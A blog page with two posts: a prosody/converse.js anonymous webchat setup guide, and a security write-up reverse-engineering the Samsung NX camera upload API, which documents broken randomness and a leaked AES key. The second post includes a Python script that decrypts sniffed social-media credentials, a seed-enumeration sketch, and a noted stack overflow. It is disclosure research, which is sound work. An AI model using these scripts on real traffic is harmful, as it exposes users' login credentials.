The goal of this post is to make an easily accessible (anonymous) webchat for any chatrooms hosted on a prosody XMPP server, using the web client converse.js.

Motivation and prerequisites

There are two use cases:

  1. Have an easily accessible default support room for users having trouble with the server or their accounts.

  2. Have a working "Join using browser" button on search.jabber.network

This setup will require:

  • A running prosody 0.12+ instance with a muc component (chat.yax.im in our example)

  • The willingness to operate an anonymous login and to handle abuse coming from it (anon.yax.im)

  • A web-server to host the static HTML and JavaScript for the webchat (https://yaxim.org/)

There are other places that describe how to set up a prosody server and a web server, so our focus is on configuring anonymous access and the webchat.

Prosody: BOSH / websockets

The web client needs to access the prosody instance over HTTPS. This can be accomplished either with Bidirectional-streams Over Synchronous HTTP (BOSH) or with the more modern WebSocket. We enable both mechanisms in prosody.cfg.lua by adding the following two lines to the global modules_enabled list; they can also be used by regular clients:

modules_enabled = {
    ...
    -- add HTTP modules:
    "bosh"; -- Enable BOSH access, aka "Jabber over HTTP"
    "websocket"; -- Modern XMPP over HTTP stream support
    ...
}

You can check if the BOSH endpoint works by visiting the /http-bind/ endpoint on your prosody's HTTPS port (5281 by default). The yax.im server is using mod_net_multiplex to allow both XMPP with Direct TLS and HTTPS on port 443, so the resulting URL is https://xmpp.yaxim.org/http-bind/.
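You can also script that check. Here is a small sketch using Python's requests package (assuming prosody answers a plain GET on /http-bind/ with its informational page):

#!/usr/bin/env python3
# quick sanity probe of the BOSH endpoint; any 200 response
# confirms that mod_bosh is reachable over HTTPS
import requests

r = requests.get("https://xmpp.yaxim.org/http-bind/")
print(r.status_code, r.headers.get("Content-Type"))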

Prosody: allowing anonymous logins

We need to add a new anonymous virtual host to the server configuration. By default, anonymous domains are only allowed to connect to services running on the same prosody instance, so they can join rooms on your server, but not connect out to other servers.

Add the new virtualhost at the end of prosody.cfg.lua:

-- add at the end, after the other VirtualHost sections, add:
VirtualHost "anon.yax.im"
    authentication = "anonymous"

    -- to allow file uploads for anonymous users, uncomment the following
    -- two lines (THIS IS NOT RECOMMENDED!)
    -- modules_enabled = { "discoitems"; }
    -- disco_items = { {"upload.yax.im"}; }

This is a new domain that needs to be made accessible to clients, so you also need to create an SRV record and ensure that your TLS certificate covers the new hostname as well, e.g. by updating the parameter list to certbot.

_xmpp-client._tcp.anon.yax.im.  3600 IN SRV 5 1 5222 xmpp.yaxim.org.
_xmpps-client._tcp.anon.yax.im. 3600 IN SRV 5 1  443 xmpp.yaxim.org.

Converse.js webchat

Converse.js is a full XMPP client written in JavaScript. The default mode embeds Converse into a website as a small overlay chat window that you can use while navigating the site.

However, we want to have a full-screen chat under the /chat/ URL and use that to join only one room at a time (either the support room or a room address that was explicitly passed) instead. For this, Converse has the fullscreen and singleton modes that we need to enable.

Furthermore, Converse does not (properly) support parsing room addresses from the URL, so we are using custom JavaScript to identify whether an address was passed as an anchor, and fall back to the support room yaxim@chat.yax.im otherwise.

The following is based on release 10.1.6 of Converse.

  1. Download the converse tarball (not converse-headless) and copy the dist folder into your document root.

  2. Create a folder chat/ or webchat/ in the document root, where the static HTML will be placed

  3. Create an index.html with the following content (minimal example):

<html lang="en">
<head>
    <title>yax.im webchat</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta name="description" content="browser-based access to the xmpp/jabber chatrooms on chat.yax.im" />
    <link type="text/css" rel="stylesheet" media="screen" href="/dist/converse.min.css" />
    <script src="/dist/converse.min.js"></script>
</head>

<body style="width: 100vw; height: 100vh; margin:0">
<div id="conversejs">
</div>
<noscript><h1>This chat only works with JavaScript enabled!</h1></noscript>
<script>
let room = window.location.search || window.location.hash;
room = decodeURIComponent(room.substring(room.indexOf('#') + 1, room.length));
if (!room) {
        room = "yaxim@chat.yax.im";
}
converse.initialize({
   "allow_muc_invitations" : false,
   "authentication" : "anonymous",
   "auto_join_on_invite" : true,
   "auto_join_rooms" : [
      room
   ],
   "auto_login" : true,
   "auto_reconnect" : false,
   "blacklisted_plugins" : [
      "converse-register"
   ],
   "jid" : "anon.yax.im",
   "keepalive" : true,
   "message_carbons" : true,
   "use_emojione" : true,
   "view_mode" : "fullscreen",
   "singleton": true,
   "websocket_url" : "wss://xmpp.yaxim.org:5281/xmpp-websocket"
});
</script>
</body>
</html>
Posted 2024-01-10 11:01

Back in 2009, Samsung introduced cameras with Wi-Fi that could upload images and videos to your social media account. The cameras talked to an (unencrypted) HTTP endpoint at Samsung's Social Network Services (SNS), probably to quickly adapt to changing upstream APIs without having to deploy new camera firmware.

This post is about reverse engineering the API based on a few old PCAPs and the binary code running on the NX300. We will find a fractal of spectacular encryption fails created by Samsung, and create a PoC reference server implementation in Python/Flask.

Before Samsung discontinued the SNS service in 2021, their faulty implementation allowed a passive attacker to decrypt the users' social media credentials (there is no need to decrypt the media, as they are uploaded in the clear). And there were quite a few buffer overflows along the way.

Skip right to the encryption fails!

Show me the code!

History

The social media upload feature was introduced with the ST1000 / CL65 model, and soon added to the compact WB150F/WB850F/ST200F and the NX series ILCs with the NX20/NX210/NX1000 introduction.

Ironically, Wi-Fi support was implemented inconsistently over the different models and generations. There is a feature matrix for the NX models with a bit of an overview of the different Wi-Fi modes, and this post only focuses on the (also inconsistently implemented) cloud-based email and social network features.

Some models like the NX mini support sending emails as well as uploading (photos only) to four different social media platforms, other models like the NX30 came with 2GB of free Dropbox storage, while the high-end NX1 and NX500 only supported sending emails through SNS, but no social media. The binary code from the NX300 reveals 16 different platforms, whereas its UI only offers 5, and it allows uploading of photos as well as videos (but only to Facebook and YouTube). In 2015, Samsung left the camera market, and in 2021 they shut down the API servers. However, these cameras are still used in the wild, and some people complained about the termination.

Given that there is no HTTPS, a private or community-driven service could be implemented by using a custom DNS server and redirecting the camera's traffic.

Back then, I took that as a chance to reverse engineer the more straight-forward SNS email API and postponed the more complex looking social media API until now.

Email API

The easy part about the email API was that the camera sent a single HTTP POST request with an XML form containing the sender, recipient, and body text, plus the pictures attached. To succeed, the API server merely had to return 200 OK. Also, the camera I was using (the NX500) didn't support any of the other services.

POST /social/columbus/email?DUID=123456789033  HTTP/1.0
Authorization:OAuth oauth_consumer_key="censored",oauth_nonce="censored",oauth_signature="censored=",oauth_signature_method="HmacSHA1",oauth_timestamp="9717886885",oauth_version="1.0"
x-osp-version:v1
User-Agent: sdeClient
Content-Type: multipart/form-data; boundary=---------------------------7d93b9550d4a
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Pragma: no-cache
Accept-Language: ko
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727)
Host: www.ospserver.net
Content-Length: 1321295

-----------------------------7d93b9550d4a
content-disposition: form-data; name="message"; fileName="sample.txt"
content-Type: multipart/form-data;

<?xml version="1.0" encoding="UTF-8"?>
<email><sender>Camera@samsungcamera.com</sender><receiverList><receiver>censored@censored.com</receiver></receiverList><title><![CDATA[[Samsung Smart Camera] sent you files.]]></title><body><![CDATA[Sent from Samsung Camera.
language_sh100_utf8]]></body></email>

-----------------------------7d93b9550d4a
content-disposition: form-data; name="binary"; fileName="SAM_4371.JPG"
content-Type: image/jpeg;

<snip>

-----------------------------7d93b9550d4a

The syntax is almost valid, except there is no closing boundary (----foo--) after the image, just a regular boundary (----foo), so unpatched HTTP servers will not consider this a valid request.
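A server reimplementation therefore has to be tolerant about the multipart syntax. As a rough illustration (a sketch, not the actual project code: the route is taken from the capture above, everything else is assumed), a Flask handler can split the body manually instead of relying on werkzeug's form parsing:

from flask import Flask, request

app = Flask(__name__)

@app.route('/social/columbus/email', methods=['POST'])
def email():
    # the camera omits the closing boundary, so split the raw body by hand
    boundary = request.content_type.split("boundary=", 1)[1].encode()
    for part in request.get_data().split(b"--" + boundary):
        if b'name="message"' in part:
            xml = part.split(b"\r\n\r\n", 1)[1]
            # TODO: parse sender/receiver/body from the XML and send the mail
    return "OK"  # a plain 200 is all the camera checks for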

Social media login

The challenge with the social media posting was that the camera sends multiple XML requests and parses the answers, XML documents in an unknown format that can no longer be obtained from the wire now that Samsung has terminated the official servers. Another challenge was that the credentials are transmitted in encrypted form, so the encryption needed to be analyzed (and possibly broken) as well. Here is the first request from the camera when logging into Facebook:

POST http://snsgw.samsungmobile.com/facebook/auth HTTP/1.1

<?xml version="1.0" encoding="UTF-8"?>
<Request Method="login" Timeout="3000" CameraCryptKey="58a4c8161c8aa7b1287bc4934a2d89fa952da1cddc5b8f3d84d3406713a7be05f67862903b8f28f54272657432036b78e695afbe604a6ed69349ced7cf46c3e4ce587e1d56d301c544bdc2d476ac5451ceb217c2d71a2a35ce9ac1b9819e7f09475bbd493ac7700dd2e8a9a7f1ba8c601b247a70095a0b4cc3baa396eaa96648">
<UserName Value="uFK%2Fz%2BkEchpulalnJr1rBw%3D%3D"/>
<Password Value="ob7Ue7q%2BkUSZFffy3%2BVfiQ%3D%3D"/>
<PersistKey Use="true"/>
4p4uaaq422af3"/>
<SessionKey Type="APIF"/>
<CryptSessionKey Use="true" Type="SHA1" Value="//////S3mbZSAQAA/LOitv////9IIgS2UgEAAAAQBLY="/>
<ApplicationKey Value="6a563c3967f147d3adfa454ef913535d0d109ba4b4584914"/>
</Request>

For the other social media platforms, the /facebook/ part of the URL is replaced with the respective service name, except that some apparently use OAuth instead of sending encrypted credentials directly.

Locating the code to reverse-engineer

Of the different models supporting the feature, the Tizen-based NX300 seemed to be the best candidate, given that it's running Linux under the hood. Even though Samsung never provided source code for the camera UI and its components, reverse-engineering an ELF binary running on a Linux host where you are root is a totally different game than trying to pierce a proprietary ARM SoC running an unknown OS from the outside.

When requesting an image upload, the camera starts a dedicated program, smart-wifi-app-nx300. Luckily, the NX300 FOSS dump contains three copies of it, two of which are not stripped:

~/TIZEN/project/NX300/$ find . -type f -name smart-wifi-app-nx300 -exec ls -alh {} \;
-rwxr-xr-x 1  5.2M Oct 16  2013 ./imagedev/usr/bin/smart-wifi-app-nx300
-rwxr-xr-x 1  519K Oct 16  2013 ./image/rootdir/usr/bin/smart-wifi-app-nx300
-rwxr-xr-x 1  5.2M Oct 16  2013 ./image/rootdir_3-5/usr/bin/smart-wifi-app-nx300

Unfortunately, the actual logic is happening in libwifi-sns.so, of which all copies are stripped. There is a header file libwifi-sns/client_predefined.h provided (by accident) as part of the dev image, but it only contains the string values from which the requests are constructed:

#define WEB_XML_LOGIN_REQUEST_PREFIX "<Request Method=\"login\" Timeout=\"3000\" CameraCryptKey=\""
#define WEB_XML_USER_PREFIX          "<UserName Value=\""
#define WEB_XML_PW_PREFIX            "<Password Value=\""
...

The program is also doing extensive debugging through /dev/log_main, including the error messages that we cause when re-creating the API.

We will load both smart-wifi-app-nx300 and libwifi-sns.so in Ghidra and use its pretty good decompiler to get an understanding of the code. The following code snippets are based on the decompiler output, edited for better understanding and brevity (error checks and debug outputs are stripped).

Processing the login credentials

When trying the upload for the first time, the camera will pop up a credentials dialog to get the username and password for the specific service:

Screenshot of the NX login dialog

Internally, the plain-text credentials and social network name are stored for later processing in a global struct gWeb, the layout of which is not known. The field names and sizes of gWeb fields in the following code blocks are based on correlating debug prints and memset() size arguments, and need to be taken with a grain of salt.

The actual auth request is prepared by the WebLogin function, which will resolve the numeric site ID into the site name (e.g. "facebook" or "kakaostory"), get the appropriate server name ("snsgw.samsungmobile.com" or a regional endpoint like na-snsgw.samsungmobile.com for North America), and call into WebMakeLoginData() to encrypt the login credentials and eventually to create a HTTP POST payload:

bool WebMakeLoginData(char *out_http_request,int site_idx) {
    /* snip quite a bunch of boring code */
    switch (WebCheckSNSGatewayLocation(site_idx)) {
    case /*0*/ LOCATION_EUROPE:
        host = "snsgw.samsungmobile.com"; break;
    case /*1*/ LOCATION_USA:
        host = "na-snsgw.samsungmobile.com"; break;
    case /*2*/ LOCATION_CHINA:
        host = "cn-snsgw.samsungmobile.com"; break;
    case /*3*/ LOCATION_SINGAPORE:
        host = "as-snsgw.samsungmobile.com"; break;
    case 4 /* unsure, maybe staging? */:
        host = "sta.snsgw.samsungmobile.com"; break;
    default: /* Asia? */
        host = "as-snsgw.samsungmobile.com"; break;
    }
    Web_Encrypt_Init();
    Web_Get_Duid(); /* calculate device unique identifier into gWeb.duid */
    Web_Get_Encrypted_Id(); /* encrypt user id into gWeb.enc_id */
    Web_Get_Encrypted_Pw(); /* encrypt password into gWeb.enc_pw */
    Web_Get_Camera_CryptKey(); /* encrypt keyspec into gWeb.encrypted_session_key */
    URLEncode(&encrypted_session_key,gWeb.encrypted_session_key);
    if (site_idx == /*5*/ SITE_SAMSUNGIMAGING || site_idx == /*6*/ SITE_CYWORLD) {
        WebMakeDataWithOAuth(out_http_request);
    } else if (site_idx == /*14*/ SITE_KAKAOSTORY) {
        /* snip HTTP POST with unencrypted credentials to sandbox-auth.kakao.com */
    } else {
        /* snip and postpone HTTP POST with XML payload to snsgw.samsungmobile.com */
    }
}

From there, Web_Encrypt_Init() is called to reset the gWeb fields, to obtain a new (symmetric) encryption key, and to encrypt the application_key:

bool Web_Encrypt_Init(void) {
    char buffer[128];
    memset(gWeb.keyspec,0,64);
    memset(gWeb.encrypted_application_key,0,128);
    memset(gWeb.enc_id,0,64);
    memset(gWeb.enc_pw,0,64);
    memset(gWeb.encrypted_session_key,0,512);
    memset(gWeb.duid,0,64);

    generateKeySpec(&gWeb.keyspec);
    dataEncrypt(&buffer,gWeb.application_key,gWeb.keyspec);
    URLEncode(&gWeb.encrypted_application_key,buffer);
}

We remember the very interesting generateKeySpec() and dataEncrypt() functions for later analysis.

WebMakeLoginData() also calls Web_Get_Encrypted_Id() and Web_Get_Encrypted_Pw() to obtain the encrypted (and base64-encoded) username and password. Those follow the same logic of dataEncrypt() plus URLEncode() to store the encrypted values in respective fields in gWeb as well.

bool Web_Get_Encrypted_Pw() {
    char buffer[128];
    memset(gWeb.enc_pw,0,64);
    dataEncrypt(&buffer,gWeb.password,gWeb.keyspec);
    URLEncode(&gWeb.enc_pw,buffer);
}

Interestingly, we are using a 128-byte intermediate buffer for the encryption result, and URL-encoding it into a 64-byte destination field. However, gWeb.password is only 32 bytes, so we are hopefully safe here. Nevertheless, there are no range checks in the code.

Finally, it calls Web_Get_Camera_CryptKey() to RSA-encrypt the generated keyspec and to store it in gWeb.encrypted_session_key. The actual encryption is done by encryptSessionKey(&gWeb.encrypted_session_key,gWeb.keyspec) which we should also look into.

Generating the secret key: generateKeySpec()

That function is as straightforward as can be: it requests two blocks of random data into a 32-byte array and returns the base64-encoded result:

int generateKeySpec(char **out_keyspec) {
    char rnd_buffer[32];
    int result;
    char *rnd1 = _secureRandom(&result);
    char *rnd2 = _secureRandom(&result);
    memcpy(rnd_buffer, rnd1, 16);
    memcpy(rnd_buffer+16, rnd2, 16);
    char *b64_buf = String_base64Encode(rnd_buffer,32,&result);
    *out_keyspec = b64_buf;
}

(In)secure random number generation: _secureRandom()

It's still worth looking into the source of randomness that we are using, which hopefully should be /dev/random or at least /dev/urandom, even on an ancient Linux system:

char *_secureRandom(int *result)
{
    srand(time(0));
    char *target = String_new(20,result);
    String_format(target,20,"%d",rand());
    target = _sha1_byte(target,result);
    return target;
}

WAIT WHAT?! Say that again, slowly! You are initializing the libc pseudo-random number generator with the current time, with one-second granularity, then getting a "random" number from it somewhere between 0 and RAND_MAX = 2147483647, then printing it into a string and calculating a 20-byte SHA1 sum of it?!?!?!

Apparently, the Samsung engineers never heard of the Debian OpenSSL random number generator, or they considered imitating it a good idea?

The entropy of this function depends only on how badly the user maintains the camera's clock, and can be expected to be about six bits (you can only set minutes, not seconds, in the camera), instead of the 128 bits required.

Calling this function twice in a row will almost always produce the same insecure block of data.
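To illustrate how small that keyspace is, here is a sketch of how an attacker could enumerate candidate keyspecs, assuming the intended sha1(rand()) behaviour (which, as we will see, only the NX mini seems to actually implement) and a glibc-compatible rand():

import ctypes, hashlib
from base64 import b64encode

libc = ctypes.CDLL("libc.so.6")

def candidate_keyspec(unix_time):
    # both _secureRandom() calls re-seed with the same second and then
    # call rand() once, so the two 16-byte halves are identical (key == IV)
    libc.srand(unix_time)
    block = hashlib.sha1(str(libc.rand()).encode()).digest()[:16]
    return b64encode(block + block)

# try every second in a window around the camera's assumed clock
candidates = [candidate_keyspec(t) for t in range(1388534000, 1388538000)]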

The function name _sha1_byte() is confusing as well, why is it a singular byte, and why is there no length parameter?

char *_sha1_byte(char *buffer, int *result) {
    int len = strlen(buffer);
    char *shabuf = malloc(20);
    int hash_len = 20;
    memset(shabuf,0,hash_len);
    SecCrHash(shabuf,&hash_len);
    return shabuf;
}

That looks plausible, right? We just assume that buffer is a NUL-terminated string (the string we pass from _secureRandom() is one), and then we... don't pass it into the SecCrHash() function? We only pass the virgin 20-byte target array to write the hash into? The hash of what?

int SecCrHash(void *dst, int *out_len) {
    char buf [20];
    *out_len = 20;
    memcpy(dst, buf, *out_len);
    return 0;
}

It turns out that the SecCrHash function (secure cryptographic hash?) is not hashing anything, nor processing any input; it just copies 20 bytes of uninitialized data from the stack to the destination buffer. So instead of returning an obfuscated timestamp, we return some (even more deterministic) data that previous function calls left on the stack.

Well, from an attacker point of view, this actually makes cracking the key (slightly) harder, as we can't just fuzz around the current time, we need to actually get an understanding of the calls happening before that and see what kind of data they can leave on the stack.

SPOILER: No, we don't have to. Samsung helpfully leaked the symmetric encryption key for us. But let's still finish this arc and see what else we can find. Skip to the encryption key leak.

Encrypting values: dataEncrypt()

The secure key material in gWeb.keyspec is passed to dataEncrypt() to actually encrypt strings:

int dataEncrypt(char **out_enc_b64, char *message, char *key_b64) {
    int result;
    char *keyspec;
    String_base64Decode(key_b64,&keyspec,&result);
    char key[16];
    char iv[16];
    memcpy(key, keyspec, 16);
    memcpy(iv, keyspec+16, 16);
    return _aesEncrypt(message, key, iv, &result);
}

char *_aesEncrypt(char *message, char *key, char *iv, int *result) {
    int bufsize = (strlen(message) + 15) & ~15; /* round up to block size */
    char *enc_data = malloc(bufsize);
    SecCrEncryptBlock(&enc_data,&bufsize,message,bufsize,key,16,iv,16);
    char *ret_buf = String_base64Encode(enc_data,bufsize,result);
    free(enc_data);
    return ret_buf;
}

The _aesEncrypt() function is calling SecCrEncryptBlock() and base64-encoding the result. From SecCrEncryptBlock() we have calls into NAT_CipherInit() and NAT_CipherUpdate() that initialize a cipher context, copy key material, and pass all calls through function pointers in the cipher context, but it all boils down to standard AES-CBC: the first half of keyspec is used as the encryption key, the second half as the IV, and the (initial) IV is the same for all dataEncrypt() calls.

The prefixes SecCr and NAT imply that some crypto library is in use, but there are no obvious results on Google or GitHub, and the function names are mostly self-explanatory.
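For testing a replacement server, the camera-side encryption can be reproduced in a few lines of Python, mirroring the logic above (a sketch; zero-padding to the block size is assumed, consistent with the trailing NULs stripped in the decryption PoC below):

from base64 import b64decode, b64encode
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

def data_encrypt(message: bytes, keyspec_b64: str) -> str:
    keyspec = b64decode(keyspec_b64)
    key, iv = keyspec[:16], keyspec[16:32]   # first half key, second half IV
    padded = message + b"\0" * (-len(message) % 16)  # round up to block size
    e = Cipher(algorithms.AES(key), modes.CBC(iv)).encryptor()
    return b64encode(e.update(padded) + e.finalize()).decode()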

Encrypting the secret key: encryptSessionKey()

This function will decode the base64-encoded 32-byte keyspec, and encrypt it with a hard-coded RSA key:

int encryptSessionKey(char **out_rsa_enc,char *keyspec) {
  int result;
  char *keyspec_raw;
  int keyspec_raw_len = String_base64Decode(keyspec,&keyspec_raw,&result);
  char *dst = _rsaEncrypt(keyspec_raw,keyspec_raw_len,
        "0x8ae4efdc724da51da5a5a023357ea25799144b1e6efbe8506fed1ef12abe7d3c11995f15"
        "dd5bf20f46741fa7c269c7f4dc5774ce6be8fc09635fe12c9a5b4104a890062b9987a6b6d69"
        "c85cf60e619674a0b48130bb63f4cf7995da9f797e2236a293ebc66ee3143c221b2ddf239b4"
        "de39466f768a6da7b11eb7f4d16387b4d7",
        "0x10001",&result);
  *out_rsa_enc = dst;
}

The _rsaEncrypt() function is using the BigDigits multiple-precision arithmetic library to add PKCS#1 v1.5 padding to the keyspec, encrypt it with the supplied modulus and exponent, and return the encrypted value. The result is a long hex number string like the one we can see in the <Request/> PCAP above.
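Re-creating encryptSessionKey() in Python is equally simple; a sketch with manual PKCS#1 v1.5 padding, with n being the hard-coded modulus from the binary:

import os

def rsa_encrypt_pkcs1_v15(data: bytes, n: int, e: int = 0x10001) -> str:
    k = (n.bit_length() + 7) // 8
    ps = bytes(b % 255 + 1 for b in os.urandom(k - len(data) - 3))  # nonzero padding
    m = int.from_bytes(b"\x00\x02" + ps + b"\x00" + data, "big")
    return format(pow(m, e, n), "0{}x".format(2 * k))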

Completing the HTTP POST: WebMakeLoginData() contd.

Now that we have all the cryptographic ingredients together, we can return to actually crafting the HTTP request.

There are three different code paths taken by WebMakeLoginData(). One into WebMakeDataWithOAuth() for the samsungimaging and cyworld sites, one creating a x-www-form-urlencoded HTTP POST to sandbox-auth.kakao.com, and one creating the XML <Request/> we've seen in the packet trace for all other social networks. Given the obscurity of the first three networks, we'll focus on the last code path:

WebString_Add_fmt(body,"%s%s","<?xml version=\"1.0\" encoding=\"UTF-8\"?>","\r\n");
WebString_Add_fmt(body,"%s%s%s",
                "<Request Method=\"login\" Timeout=\"3000\" CameraCryptKey=\"",
                encrypted_session_key,"\">\r\n");
if (site_idx != /*34*/ SITE_SKYDRIVE) {
    WebString_Add_fmt(body,"%s%s%s","<UserName Value=\"",gWeb.enc_id,"\"/>\r\n");
    WebString_Add_fmt(body,"%s%s%s","<Password Value=\"",gWeb.enc_pw,"\"/>\r\n");
}
WebString_Add_fmt(body,"%s%s%s","<PersistKey Use=\"true\"/>\r\n",duid,"\"/>\r\n");
WebString_Add_fmt(body,"%s%s","<SessionKey Type=\"APIF\"/>","\r\n");
WebString_Add_fmt(body,"%s%s%s","<CryptSessionKey Use=\"true\" Type=\"SHA1\" Value=\"",
                gWeb.keyspec,"\"/>\r\n");
WebString_Add_fmt(body,"%s%s%s","<ApplicationKey Value=\"",gWeb.application_key,
                "\"/>\r\n");
WebString_Add_fmt(body,"%s%s","</Request>","\r\n");
body_len = strlen(body);
WebString_Add_fmt(header,"%s%s%s%s","POST /",gWeb.site,"/auth HTTP/1.1","\r\n");
WebString_Add_fmt(header,"%s%s%s","Host: ",host,"\r\n");
WebString_Add_fmt(header,"%s%s","Content-Type: text/xml;charset=utf-8","\r\n");
WebString_Add_fmt(header,"%s%s%s","User-Agent: ","DI-NX300","\r\n");
WebString_Add_fmt(header,"%s%d%s","Content-Length: ",body_len,"\r\n\r\n");
WebAddString(out_http_request, header);
WebAddString(out_http_request, body);

Okay, so generating XML via a fancy sprintf() has been frowned upon for a long time. However, if done correctly, and if there is no attacker-controlled input with escape characters, this can be an acceptable approach.

In our case, the duid is surrounded by closing tags due to an obvious programmer error, but beyond that, all parameters are properly controlled by encoding them in hex, in base64, or in URL-encoded base64.

We are transmitting the RSA-encrypted session key (as CameraCryptKey), the AES-encrypted username and password (except when uploading to SkyDrive), the duid (outside of a valid XML element), the application_key that we encrypted earlier (but we are sending the unencrypted variable) and the keyspec in the CryptSessionKey element.

The keyspec? Isn't that the secret AES key? Well, yes it is. All that RSA code turns out to be a red herring: we get the encryption key handed to us on a silver platter!

Decrypting the sniffed login credentials

Can it be that easy? Here's a minimal proof-of-concept in python:

#!/usr/bin/env python3

from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from base64 import b64decode
from urllib.parse import unquote
import xml.etree.ElementTree as ET
import sys

def decrypt_string(key, s):
    d = Cipher(algorithms.AES(key[0:16]), modes.CBC(key[16:])).decryptor()
    plaintext = d.update(s)
    return plaintext.decode('utf-8').rstrip('\0')

def decrypt_credentials(xml):
    x_csk = xml.find("CryptSessionKey")
    x_user = xml.find("UserName")
    x_pw = xml.find("Password")

    key = b64decode(x_csk.attrib['Value'])
    enc_user = b64decode(unquote(x_user.attrib['Value']))
    enc_pw = b64decode(unquote(x_pw.attrib['Value']))

    return (key, decrypt_string(key, enc_user), decrypt_string(key, enc_pw))

def decrypt_file(fn):
    key, user, pw = decrypt_credentials(ET.parse(fn).getroot())
    print('User:', user, 'Password:', pw)

for fn in sys.argv[1:]:
    decrypt_file(fn)

If we pass the earlier <Request/> XML to this script, we get this:

User: x Password: z

Looks like somebody couldn't be bothered to touch-tap-type long values.

Now we can also see what kind of garbage stack data is used as the encryption keys.

On the NX300, the results confirm our analysis: this looks very much like stack garbage, with minor variations between _secureRandom() calls:

00000000: ffff ffff f407 a5b6 5201 0000 fc03 aeb6  ........R.......
00000010: ffff ffff 4872 0fb6 5201 0000 0060 0fb6  ....Hr..R....`..

00000000: ffff ffff f487 9ab6 5201 0000 fc83 a3b6  ........R.......
00000010: ffff ffff 48f2 04b6 5201 0000 00e0 04b6  ....H...R.......

00000000: ffff ffff 48a2 04b6 5201 0000 0090 04b6  ....H...R.......
00000010: ffff ffff 48a2 04b6 5201 0000 0090 04b6  ....H...R.......

00000000: ffff ffff f4a7 9ab6 5201 0000 fca3 a3b6  ........R.......
00000010: ffff ffff 4812 05b6 5201 0000 0000 05b6  ....H...R.......

00000000: ffff ffff f4b7 99b6 5201 0000 fcb3 a2b6  ........R.......
00000010: ffff ffff 4822 04b6 5201 0000 0010 04b6  ....H"..R.......

00000000: ffff ffff 48f2 04b6 5201 0000 00e0 04b6  ....H...R.......
00000010: ffff ffff 48f2 04b6 5201 0000 00e0 04b6  ....H...R.......

On the NX mini, the data looks much more random, but consistently key == iv, suggesting that it actually is a sort of sha1(rand()):

00000000: 00e0 fdcd e5ae ea50 a359 8204 03da f992  .......P.Y......
00000010: 00e0 fdcd e5ae ea50 a359 8204 03da f992  .......P.Y......

00000000: 0924 ea0e 9a5c e6ef f26f 75a9 3e97 ced7  .$...\...ou.>...
00000010: 0924 ea0e 9a5c e6ef f26f 75a9 3e97 ced7  .$...\...ou.>...

00000000: 98b8 d78f 5ccc 89a9 2c0f 0736 d5df f412  ....\...,..6....
00000010: 98b8 d78f 5ccc 89a9 2c0f 0736 d5df f412  ....\...,..6....

00000000: d1df 767e eb51 bd40 96d0 3c89 1524 a61c  ..v~.Q.@..<..$..
00000010: d1df 767e eb51 bd40 96d0 3c89 1524 a61c  ..v~.Q.@..<..$..

00000000: d757 4c46 d96d 262f a986 3587 7d29 7429  .WLF.m&/..5.})t)
00000010: d757 4c46 d96d 262f a986 3587 7d29 7429  .WLF.m&/..5.})t)

00000000: dd56 9b41 e2f9 ac11 12b7 1b8c af56 187a  .V.A.........V.z
00000010: dd56 9b41 e2f9 ac11 12b7 1b8c af56 187a  .V.A.........V.z

Social media login response

The HTTP POST request is passed to WebOperateLogin() which will create a TCP socket to port 80 of the target host, send the request and receive the response into a 2KB buffer:

bool WebOperateLogin(int sock_idx,char *buf,ulong site_idx) {
    int buflen = strlen(buf);
    SendTCPSocket(sock_idx,buf,buflen,0,false,0,0);
    rx_buf = malloc(2048);
    int rx_size = ReceiveTCPProcess(sock_idx,rx_buf,300);
    bool login_result = WebCheckLogin(rx_buf,site_idx);
}

The TCP process (actually just a pthread) will clear the buffer and read up to 2047 bytes, ensuring a NUL-terminated result. The response is then "parsed" to extract success / failure flags.

Parsing the login response: WebCheckLogin()

The HTTP response (header plus body) is then searched for certain "XML" "fields" to parse out relevant data:

bool WebCheckLogin(char *buf,int site_idx) {
    char value[512];
    memset(value,0,512);
    if (GetXmlString(buf,"ErrCode",value)) {
        strcpy(gWeb.ErrCode,value); /* gWeb.ErrCode is 16 bytes */
        if (!GetXmlString(buf, "ErrSubCode",value))
            return false;
        strcpy(gWeb.SubErrCode,value); /* gWeb.SubErrCode is also 16 bytes */
        return false;
    }
    if (!GetXmlString(buf,"Response SessionKey",value))
        return false;
    strcpy(gWeb.response_session_key,value); /* ... 64 bytes */
    memset(value,0,512);
    if (!GetXmlString(buf,"PersistKey Value",value))
        return false;
    strcpy(gWeb.persist_key,value); /* ... 64 bytes */
    memset(value,0,512);
    if (!GetXmlString(buf,"CryptSessionKey Value",value))
        return false;
    memset(gWeb.keyspec,0,64);
    strcpy(gWeb.keyspec,value); /* ... 64 bytes */
    if (site_idx == /*34*/ SITE_SKYDRIVE) {
        strcpy(gWeb.LoginPeopleID, "owner");
    } else {
        memset(value,0,512);
        if (!GetXmlString(buf,"LoginPeopleID",value)) {
            return false;
        }
    }
    strcpy(gWeb.LoginPeopleID,value); /* ... 128 bytes */
    if (site_idx == /*34*/ SITE_SKYDRIVE) {
        memset(value,0,512);
        if (!GetXmlString(buf,"OAuth URL",value))
            return false;
        ReplaceString(value,"&amp;","&",skydriveURL);
    }
    return true;
}

The GetXmlString() function name is actually quite a euphemism. It does not parse XML at all. Instead, it searches for the first verbatim occurrence of the passed field name (including any whitespace in it), checks that it is followed by a colon or an equals sign, and then copies everything between the following quotes into out_value. It does not check the buffer bounds and doesn't ensure NUL-termination, so the caller has to clear the buffer each time (which it doesn't do consistently):

bool GetXmlString(char *xml,char *field,char *out_value) {
    char *position = strstr(xml, field);
    if (!position)
        return false;
    int field_len = strlen(field);
    char *field_end = position + field_len;
    /* snip some decompile that _probably_ checks for a '="' or ':"' postfix at field_end */
    char *value_begin = position + field_len + 2;
    char *value_end = strstr(value_begin,"\"");
    if (!value_end)
        return false;
    memcpy(out_value, value_begin, value_end - value_begin);
    return true;
}

Given that the XML buffer is 2047 bytes controlled by the attacker (i.e. the server operator), and value is a 512-byte buffer on the stack, this calls for some happy stack smashing!

